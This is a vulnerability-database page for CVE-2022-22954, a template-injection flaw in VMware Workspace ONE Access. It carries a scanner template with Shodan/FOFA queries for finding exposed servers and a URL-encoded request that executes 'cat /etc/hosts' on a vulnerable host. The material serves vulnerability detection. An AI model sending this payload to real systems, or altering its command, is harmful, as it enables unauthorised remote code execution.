| Reporter | Title | Published | Views | Family All 79 |
|---|---|---|---|---|
| Exploit for Code Injection in Vmware Identity_Manager | 3 Jun 202208:51 | – | githubexploit | |
| Exploit for Code Injection in Vmware Identity_Manager | 15 Apr 202219:26 | – | githubexploit | |
| Exploit for Code Injection in Vmware Identity_Manager | 11 Apr 202223:21 | – | githubexploit | |
| Exploit for Code Injection in Vmware Identity_Manager | 1 Jun 202219:33 | – | githubexploit | |
| Exploit for Code Injection in Vmware Identity_Manager | 3 Jun 202209:17 | – | githubexploit | |
| Exploit for Code Injection in Vmware Identity_Manager | 11 Apr 202213:59 | – | githubexploit | |
| Exploit for Code Injection in Vmware Identity_Manager | 13 Apr 202208:52 | – | githubexploit | |
| Exploit for Code Injection in Vmware Identity_Manager | 14 Apr 202223:38 | – | githubexploit | |
| Exploit for Code Injection in Vmware Identity_Manager | 12 Apr 202204:14 | – | githubexploit | |
| Exploit for Code Injection in Vmware Identity_Manager | 9 Oct 202010:14 | – | githubexploit |
id: CVE-2022-22954
info:
name: VMware Workspace ONE Access - Server-Side Template Injection
author: sherlocksecurity
severity: critical
description: |
VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.
impact: |
Successful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
remediation: |
Apply the latest security patches provided by VMware to mitigate this vulnerability.
reference:
- https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011
- https://www.vmware.com/security/advisories/VMSA-2022-0011.html
- http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-22954
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-22954
cwe-id: CWE-94
epss-score: 0.99997
epss-percentile: 0.99988
cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: vmware
product: identity_manager
shodan-query: http.favicon.hash:-1250474341
fofa-query:
- icon_hash=-1250474341
- app="vmware-workspace-one-access" || app="vmware-identity-manager" || app="vmware-vrealize"
tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Authorization context is not valid"
- type: status
status:
- 400
# digest: 4a0a00473045022100f286ad04305e417b70ab4667e460fb35c387e32996ac32ff8dcf7fcf8f0218ce022064f57002c1b846b99eb64bf73ba1a7484e8676fc0864b97ff06c730962ae7889:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation